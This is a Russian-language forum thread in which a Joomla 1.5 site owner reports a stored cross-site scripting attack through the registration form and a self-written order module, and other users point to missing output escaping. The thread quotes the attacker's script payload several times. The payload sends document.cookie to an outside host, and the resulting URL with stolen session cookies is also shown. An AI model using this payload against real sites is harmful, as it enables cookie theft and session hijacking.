Ввод кода в поле при регистрации - Безопасность сайтов на Joomla

Стоит Joomla 1.5.25 русская. Включено мыло нотификации при регистрации нового юзера.
И сегодня такая ситуация приключилась.
Пришло мыло такого содержания:

Новый пользователь зарегистрирован на сайте *****

Параметры учетной записи:

Имя - '">document.location.replace('http://deineka.ho.ua/gc.php?proc='+document.cookie);
e-mail - asdf@af.com
Логин - asdf

Смотрю появился юзер с таким кодоником.
Внешне ничего не снес, но в сайте есть самописный модуль заказов с текстовыми полями, там вредитель ввел такой код:

Название продукта: <b>\'\"><script>document.location.replace(\'http://deineka.ho.ua/gc.php?proc=\'+document.cookie);</script></b>
Ссылка на продукт: <a href="\'\"><script>document.location.replace(\'http://deineka.ho.ua/gc.php?proc=\'+document.cookie);</script>" target=_blank>\'\"><script>document.location.replace(\'http://deineka.ho.ua/gc.php?proc=\'+document.cookie);</script></a>
Комментарии и пожелания:
\'\"><script>document.location.replace(\'http://deineka.ho.ua/gc.php?proc=\'+document.cookie);</script>

В итоге при входе в заказы, меня перекидывало на данный сайт : http://deineka.ho.ua/gc.php?proc=configuration=system;%20ja_barite_tpl=ja_barite;%20__utma=50448697.909124112.1329591684.1331316799.1331640717.14;%20__utmz=50448697.1329591684.1.1.utmcsr=%28direct%29|utmccn=%28direct%29|utmcmd=%28none%29;%208c146e575de0e2c5c21eec91b78f28f3=9da7a760e7c4766a0467ebfdb09f3913

Удалил через базу заказы и юзера. Все вроде ОК.
Подскажите как не пропускать таких негодяев и код при регистрации.

Регистрация идет через стандартный модуль Joomla или Virtue?

Стандартный модуль Joomla.

пароль смените на всякий пожарный =) А так фильтровать надо данные, которые из формы приходят... и при выводе тоже.

А как фильтровать ыввод данных при регистрации в стандартном модуле Joomla?

А как фильтровать ыввод данных при регистрации в стандартном модуле Joomla?

Если я правильно понял, то проблема в заказах, а не в регистрационных данных. Когда заходите в админке в список пользователей - тоже редиректит? Думаю нет. Проблема в вашей самописной форме заказов я думаю.

Проблема как раз в регистрации. Пропустила код.

Проблема как раз в регистрации. Пропустила код.

ЧТо значит пропустила код? Она их просто заэскейпила и сохранила в базу. А Вы в своем компоненте заказов вместо того чтобы обрабатывать данные перед выводом хотя бы с помощью htmlspecalchars просто вывели эту строку. Вот и косяк. Без кода точно сказать не могу. Но по описанию картина такая.